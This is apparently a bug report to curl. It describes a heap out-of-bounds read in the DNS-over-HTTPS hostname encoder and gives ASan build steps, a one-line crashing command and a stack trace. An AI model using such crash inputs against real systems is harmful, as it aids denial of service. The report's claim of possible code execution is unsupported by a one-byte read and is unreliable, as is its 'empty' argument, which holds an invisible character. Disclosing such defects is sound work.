Heap-buffer-overflow (Out-of-Bounds Read) in DoH hostname encoding

**Summary:** I found a heap-buffer-overflow in the `doh_req_encode` function in `lib/doh.c`. The bug happens when curl processes a DNS-over-HTTPS request for a hostname that is an empty string. The code gets the string length as 0, then tries to access `host[len - 1]`, which becomes `host[-1]`. This is an out-of-bounds read. It reads memory just before the allocated buffer. ----- ### **Steps to Reproduce:** 1. Compile curl with AddressSanitizer. ```bash autoreconf -fi CFLAGS="-g -fsanitize=address" ./configure --with-openssl make ``` 2. Run this simple command. The arguments `0` and `'‌'` cause curl to process an empty string hostname. ```bash ./src/curl 0 --doh-url 0 '‌' ``` 3. The program will crash and you'll see the ASan report. ``` ==2649804==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7c1ff51e756f at pc 0x5555556dd998 bp 0x7fffffffc9c0 sp 0x7fffffffc9b0 READ of size 1 at 0x7c1ff51e756f thread T0 #0 0x5555556dd997 in doh_req_encode /home/anuja/curl1/curl/lib/doh.c:115 #1 0x5555556dd997 in doh_probe_run /home/anuja/curl1/curl/lib/doh.c:306 #2 0x5555556de35b in Curl_doh /home/anuja/curl1/curl/lib/doh.c:487 #3 0x55555561f0ee in Curl_resolv /home/anuja/curl1/curl/lib/hostip.c:923 #4 0x55555567ae1c in resolve_server /home/anuja/curl1/curl/lib/url.c:3305 ``` ## Impact Crash or, potentially, arbitrary code execution.